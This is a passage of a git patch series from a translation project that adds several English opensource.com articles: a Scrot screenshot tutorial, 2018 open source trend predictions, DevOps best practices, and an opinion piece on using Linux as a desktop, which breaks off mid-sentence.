returning your e-mails, you're free to approach a different publisher or consider self-publishing. + +### Good luck + +If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control. + +Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information. + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] + + Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/how-find-publisher-your-book + +作者:[Brian MacDonald ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/bmacdonald +[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s +[2]:https://opensource.com/users/bmacdonald +[3]:https://opensource.com/user/190176/feed +[4]:https://pragprog.com/ +[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook +[7]:https://opensource.com/users/bmacdonald +[8]:https://opensource.com/users/bmacdonald +[9]:https://opensource.com/users/bmacdonald +[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments From aa1c7ad9a987f99345a33c83d5a8c6599296d6d2 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:00:54 +0800 Subject: [PATCH 0175/1627] =?UTF-8?q?20171203-12=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...x command-line screen grabs made simple.md | 108 ++++++++++++++++++ 1 file changed, 108 insertions(+) create mode 100644 sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md diff --git a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md new file mode 100644 index 0000000000..2b4d2248b2 --- /dev/null +++ b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md @@ -0,0 +1,108 @@ +Scrot: Linux command-line screen grabs made simple +============================================================ + +### Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. + +![Scrot: Screen grabs made simple](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A "Scrot: Screen grabs made simple") +Image credits : Original photo by Rikki Endsley. [CC BY-SA 4.0][13] + +There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][14] and [Shutter][15]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? + +Turn to the command line and a little utility called [Scrot][16]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. + +### Getting started with Scrot + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][22]. + +To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) + +Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. + +### Taking a screen capture of a single window + +Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. + +The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. + +To grab another window on your desktop, type `scrot -s [filename]`. + +The `-s` option lets you do one of two things: + +* select an open window, or + +* draw a rectangle around a window or a portion of a window to capture it. + +You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. + +The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. + +### More useful options + +Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: + +* `-b` also grabs the window's border + +* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. + +* `-c` creates a countdown in your terminal when you use the `-d` option. + +To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][17]. Then start snapping images of your screen. + +It's basic, but Scrot gets the job done nicely. + +### Topics + + [Linux][23] + +### About the author + + [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] + + Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][7], [Mastodon][8], [GitHub][9], and... [more about Scott Nesbitt][10][More about me][11] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot + +作者:[ Scott Nesbitt  ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot?rate=H43kUdawjR0GV9D0dCbpnmOWcqw1WekfrAI_qKo8UwI +[7]:http://www.twitter.com/ScottWNesbitt +[8]:https://mastodon.social/@scottnesbitt +[9]:https://github.com/ScottWNesbitt +[10]:https://opensource.com/users/scottnesbitt +[11]:https://opensource.com/users/scottnesbitt +[12]:https://opensource.com/user/14925/feed +[13]:https://creativecommons.org/licenses/by-sa/4.0/ +[14]:https://www.kde.org/applications/graphics/ksnapshot/ +[15]:https://launchpad.net/shutter +[16]:https://github.com/dreamer/scrot +[17]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html +[18]:https://opensource.com/users/scottnesbitt +[19]:https://opensource.com/users/scottnesbitt +[20]:https://opensource.com/users/scottnesbitt +[21]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot#comments +[22]:https://github.com/dreamer/scrot +[23]:https://opensource.com/tags/linux From 5ad4aeb22d6dc01c00daf3cb6178db001472c692 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:02:51 +0800 Subject: [PATCH 0176/1627] =?UTF-8?q?20171203-12=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... open source technology trends for 2018.md | 140 ++++++++++++++++++ 1 file changed, 140 insertions(+) create mode 100644 sources/tech/20171129 10 open source technology trends for 2018.md diff --git a/sources/tech/20171129 10 open source technology trends for 2018.md b/sources/tech/20171129 10 open source technology trends for 2018.md new file mode 100644 index 0000000000..1e7b137726 --- /dev/null +++ b/sources/tech/20171129 10 open source technology trends for 2018.md @@ -0,0 +1,140 @@ +10 open source technology trends for 2018 +============================================================ + +### What do you think will be the next open source tech trends? Here are 10 predictions. + +![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") +Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] + +Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018. + +### 1\. OpenStack gains increasing acceptance + +[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard. + +Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources. + +The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing. + +### 2\. Progressive Web Apps become popular + +[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser. + +Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything. + +PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer. + +### 3\. Rust to rule the roost + +Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage. + +Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018. + +### 4\. R user community grows + +The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances. + +Like Rust, R's fortunes are on the rise. + +### 5\. XaaS expands in scope + +XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away. + +The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service. + +High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further. + +### 6\. Containers gain even more acceptance + +Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex. + +Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business. + +### 7\. Machine learning and artificial intelligence expand in scope + +[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction. + +These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications. + +[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning. + +New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work. + +* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines. + +* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018. + +* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes. + +### 8\. Blockchain becomes mainstream + +Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology. + +Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future. + +### 9\. Cognitive cloud moves to center stage + +Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud. + +Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs. + +Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year. + +### 10\. The Internet of Things connects more things + +At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux. + +One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more. + +### Open source drives innovation + +Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations. + +Which open source trends and technologies would you add to this list? Let us know in the comments. + +### Topics + + [Business][25][Yearbook][26][2017 Open Source Yearbook][27] + +### About the author + + [![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 + +作者:[Sreejith ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/sreejith +[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ +[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ +[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I +[6]:https://www.fingent.com/ +[7]:https://www.linkedin.com/in/futuregeek/ +[8]:https://opensource.com/users/sreejith +[9]:https://opensource.com/user/185026/feed +[10]:https://www.flickr.com/photos/mitchell3417/9206373620 +[11]:https://creativecommons.org/licenses/by-sa/4.0/ +[12]:https://www.openstack.org/ +[13]:https://developers.google.com/web/progressive-web-apps/ +[14]:https://www.rust-lang.org/ +[15]:https://en.wikipedia.org/wiki/Pwn2Own +[16]:https://en.wikipedia.org/wiki/R_(programming_language) +[17]:https://en.wikipedia.org/wiki/S_(programming_language) +[18]:https://opensource.com/tags/artificial-intelligence +[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/ +[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/ +[21]:https://opensource.com/users/sreejith +[22]:https://opensource.com/users/sreejith +[23]:https://opensource.com/users/sreejith +[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments +[25]:https://opensource.com/tags/business +[26]:https://opensource.com/tags/yearbook +[27]:https://opensource.com/yearbook/2017 From 332a0e4f64b4914ee83824308a780a501dc4489d Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:04:31 +0800 Subject: [PATCH 0177/1627] =?UTF-8?q?20171203-13=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...actices for getting started with DevOps.md | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 sources/tech/20171129 5 best practices for getting started with DevOps.md diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md new file mode 100644 index 0000000000..962f37aaf4 --- /dev/null +++ b/sources/tech/20171129 5 best practices for getting started with DevOps.md @@ -0,0 +1,94 @@ +5 best practices for getting started with DevOps +============================================================ + +### Are you ready to implement DevOps, but don't know where to begin? Try these five best practices. + + +![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") +Image by :  + +[Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] + +DevOps often stymies early adopters with its ambiguity, not to mention its depth and breadth. By the time someone buys into the idea of DevOps, their first questions usually are: "How do I get started?" and "How do I measure success?" These five best practices are a great road map to starting your DevOps journey. + +### 1\. Measure all the things + +You don't know for sure that your efforts are even making things better unless you can quantify the outcomes. Are my features getting out to customers more rapidly? Are fewer defects escaping to them? Are we responding to and recovering more quickly from failure? + +Before you change anything, think about what kinds of outcomes you expect from your DevOps transformation. When you're further into your DevOps journey, you'll enjoy a rich array of near-real-time reports on everything about your service. But consider starting with these two metrics: + +* **Time to market** measures the end-to-end, often customer-facing, business experience. It usually begins when a feature is formally conceived and ends when the customer can consume the feature in production. Time to market is not mainly an engineering team metric; more importantly it shows your business' complete end-to-end efficiency in bringing valuable new features to market and isolates opportunities for system-wide improvement. + +* **Cycle time** measures the engineering team process. Once work on a new feature starts, when does it become available in production? This metric is very useful for understanding the efficiency of the engineering team and isolating opportunities for team-level improvement. + +### 2\. Get your process off the ground + +DevOps success requires an organization to put a regular (and hopefully effective) process in place and relentlessly improve upon it. It doesn't have to start out being effective, but it must be a regular process. Usually that it's some flavor of agile methodology like Scrum or Scrumban; sometimes it's a Lean derivative. Whichever way you go, pick a formal process, start using it, and get the basics right. + +Regular inspect-and-adapt behaviors are key to your DevOps success. Make good use of opportunities like the stakeholder demo, team retrospectives, and daily standups to find opportunities to improve your process. + +A lot of your DevOps success hinges on people working effectively together. People on a team need to work from a common process that they are empowered to improve upon. They also need regular opportunities to share what they are learning with other stakeholders, both upstream and downstream, in the process. + +Good process discipline will help your organization consume the other benefits of DevOps at the great speed that comes as your success builds. + +Although it's common for more development-oriented teams to successfully adopt processes like Scrum, operations-focused teams (or others that are more interrupt-driven) may opt for a process with a more near-term commitment horizon, such as Kanban. + +### 3\. Visualize your end-to-end workflow + +There is tremendous power in being able to see who's working on what part of your service at any given time. Visualizing your workflow will help people know what they need to work on next, how much work is in progress, and where the bottlenecks are in the process. + +You can't effectively limit work in process until you can see it and quantify it. Likewise, you can't effectively eliminate bottlenecks until you can clearly see them. + +Visualizing the entire workflow will help people in all parts of the organization understand how their work contributes to the success of the whole. It can catalyze relationship-building across organizational boundaries to help your teams collaborate more effectively towards a shared sense of success. + +### 4\. Continuous all the things + +DevOps promises a dizzying array of compelling automation. But Rome wasn't built in a day. One of the first areas you can focus your efforts on is [continuous integration][10] (CI). But don't stop there; you'll want to follow quickly with [continuous delivery][11] (CD) and eventually continuous deployment. + +Your CD pipeline is your opportunity to inject all manner of automated quality testing into your process. The moment new code is committed, your CD pipeline should run a battery of tests against the code and the successfully built artifact. The artifact that comes out at the end of this gauntlet is what progresses along your process until eventually it's seen by customers in production. + +Another "continuous" that doesn't get enough attention is continuous improvement. That's as simple as setting some time aside each day to ask your colleagues: "What small thing can we do today to get better at how we do our work?" These small, daily changes compound over time into more profound results. You'll be pleasantly surprised! But it also gets people thinking all the time about how to improve things. + +### 5\. Gherkinize + +Fostering more effective communication across your organization is crucial to fostering the sort of systems thinking prevalent in successful DevOps journeys. One way to help that along is to use a shared language between the business and the engineers to express the desired acceptance criteria for new features. A good product manager can learn [Gherkin][12] in a day and begin using it to express acceptance criteria in an unambiguous, structured form of plain English. Engineers can use this Gherkinized acceptance criteria to write acceptance tests against the criteria, and then develop their feature code until the tests pass. This is a simplification of [acceptance test-driven development][13](ATDD) that can also help kick start your DevOps culture and engineering practice. + +### Start on your journey + +Don't be discouraged by getting started with your DevOps practice. It's a journey. And hopefully these five ideas give you solid ways to get started. + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] + + Magnus Hedemark - Magnus has been in the IT industry for over 20 years, and a technology enthusiast for most of his life. He's presently Manager of DevOps Engineering at UnitedHealth Group. In his spare time, Magnus enjoys photography and paddling canoes. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/5-keys-get-started-devops + +作者:[Magnus Hedemark ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/magnus919 +[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 +[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 +[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 +[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 +[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 +[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI +[7]:https://opensource.com/user/25739/feed +[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== +[9]:https://creativecommons.org/licenses/by-sa/4.0/ +[10]:https://martinfowler.com/articles/continuousIntegration.html +[11]:https://martinfowler.com/bliki/ContinuousDelivery.html +[12]:https://cucumber.io/docs/reference +[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development +[14]:https://opensource.com/users/magnus919 +[15]:https://opensource.com/users/magnus919 +[16]:https://opensource.com/users/magnus919 +[17]:https://opensource.com/tags/devops From e242bfb0f18d540f80eb370805bd4b427dda5141 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:06:04 +0800 Subject: [PATCH 0178/1627] =?UTF-8?q?20171203-14=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...71128 The politics of the Linux desktop.md | 110 ++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 sources/tech/20171128 The politics of the Linux desktop.md diff --git a/sources/tech/20171128 The politics of the Linux desktop.md b/sources/tech/20171128 The politics of the Linux desktop.md new file mode 100644 index 0000000000..c9117dacfe --- /dev/null +++ b/sources/tech/20171128 The politics of the Linux desktop.md @@ -0,0 +1,110 @@ +The politics of the Linux desktop +============================================================ + +### If you're working in open source, why would you use anything but Linux as your main desktop? + + +![The politics of the Linux desktop](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_networks.png?itok=XasNXxKs "The politics of the Linux desktop") +Image by : opensource.com + +At some point in 1997 or 1998—history does not record exactly when—I made the leap from Windows to the Linux desktop. I went through quite a few distributions, from Red Hat to SUSE to Slackware, then Debian, Debian Experimental, and (for a long time thereafter) Ubuntu. When I accepted a role at Red Hat, I moved to Fedora, and migrated both my kids (then 9 and 11) to Fedora as well. + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +For a few years, I kept Windows as a dual-boot option, and then realised that, if I was going to commit to Linux, then I ought to go for it properly. In losing Windows, I didn't miss much; there were a few games that I couldn't play, but it was around the time that the Civilization franchise was embracing Linux, so that kept me happy. + +The move to Linux wasn't plain sailing, by any stretch of the imagination. If you wanted to use fairly new hardware in the early days, you had to first ensure that there were  _any_  drivers for Linux, then learn how to compile and install them. If they were not quite my friends, **lsmod** and **modprobe** became at least close companions. I taught myself to compile a kernel and tweak the options to make use of (sometimes disastrous) new, "EXPERIMENTAL" features as they came out. Early on, I learned the lesson that you should always keep at least one kernel in your [LILO][12] list that you were  _sure_  booted fully. I cursed NVidia and grew horrified by SCSI. I flirted with early journalling filesystem options and tried to work out whether the different preempt parameters made any noticeable difference to my user experience or not. I began to accept that printers would never print—and then they started to. I discovered that the Bluetooth stack suddenly started to connect to things. + +Over the years, using Linux moved from being an uphill struggle to something that just worked. I moved my mother-in-law and then my father over to Linux so I could help administer their machines. And then I moved them off Linux so they could no longer ask me to help administer their machines. + +Over the years, using Linux moved from being an uphill struggle to something that just worked.It wasn't just at home, either: I decided that I would use Linux as my desktop for work, as well. I even made it a condition of employment for at least one role. Linux desktop support in the workplace caused different sets of problems. The first was the "well, you're on your own: we're not going to support you" email from IT support. VPNs were touch and go, but in the end, usually go. + +The biggest hurdle was Microsoft Office, until I discovered [CrossOver][13], which I bought with my own money, and which allowed me to run company-issued copies of Word, PowerPoint, and the rest on my Linux desktop. Fonts were sometimes a problem, and one company I worked for required Microsoft Lync. For this, and for a few other applications, I would sometimes have to run a Windows virtual machine (VM) on my Linux desktop.  Was this a cop out?  Well, a little bit: but I've always tried to restrict my usage of this approach to the bare minimum. + +### But why? + +"Why?" colleagues would ask. "Why do you bother? Why not just run Windows?" + +"Because I enjoy pain," was usually my initial answer, and then the more honest, "because of the principle of the thing." + +So this is it: I believe in open source. We have a number of very, very good desktop-compatible distributions these days, and most of the time they just work. If you use well-known or supported hardware, they're likely to "just work" pretty much as well as the two obvious alternatives, Windows or Mac. And they just work because many people have put much time into using them, testing them, and improving them. So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider  _not_  using Linux? If, as I do, you believe in open source, and particularly if you work within the open source community or are employed by an open source organisation, I struggle to see why you would even consider not using Linux. + +So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider not using Linux?I've spoken to people about this (of course I have), and here are the most common reasons—or excuses—I've heard. + +1. I'm more productive on Windows/Mac. + +2. I can't use app X on Linux, and I need it for my job. + +3. I can't game on Linux. + +4. It's what our customers use, so why we would alienate them? + +5. "Open" means choice, and I prefer a proprietary desktop, so I use that. + +Interestingly, I don't hear "Linux isn't good enough" much anymore, because it's manifestly untrue, and I can show that my own experience—and that of many colleagues—belies that. + +### Rebuttals + +If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications.Let's go through those answers and rebut them. + +1. **I'm more productive on Windows/Mac.** I'm sure you are. Anyone is more productive when they're using a platform or a system they're used to. If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications. If you're working for an open source organisation, they'll probably help you along, and you're unlikely to find you're much less productive in the long term. And, you know what? If you are less productive in the long term, then get in touch with the maintainers of the apps that are causing you to be less productive and help improve them. You don't have to be a coder. You could submit bug reports, suggest improvements, write documentation, or just test the most recent versions of the software. And then you're helping yourself and the rest of the community. Welcome to open source. + +1. **I can't use app X on Linux, and I need it for my job.** This may be true. But it's probably less true than you think. The people most often saying this with conviction are audio, video, or graphics experts. It was certainly the case for many years that Linux lagged behind in those areas, but have a look and see what the other options are. And try them, even if they're not perfect, and see how you can improve them. Alternatively, use a VM for that particular app. + +1. **I can't game on Linux.** Well, you probably can, but not all the games that you enjoy. This, to be clear, shouldn't really be an excuse not to use Linux for most of what you do. It might be a reason to keep a dual-boot system or to do what I did (after much soul-searching) and buy a games console (because Elite Dangerous really  _doesn't_  work on Linux, more's the pity). It should also be an excuse to lobby for your favourite games to be ported to Linux. + +1. **It's what our customers use, so why would we alienate them?** I don't get this one. Does Microsoft ban visitors with Macs from their buildings? Does Apple ban Windows users? Does Google allow non-Android phones through their doors? You don't kowtow to the majority when 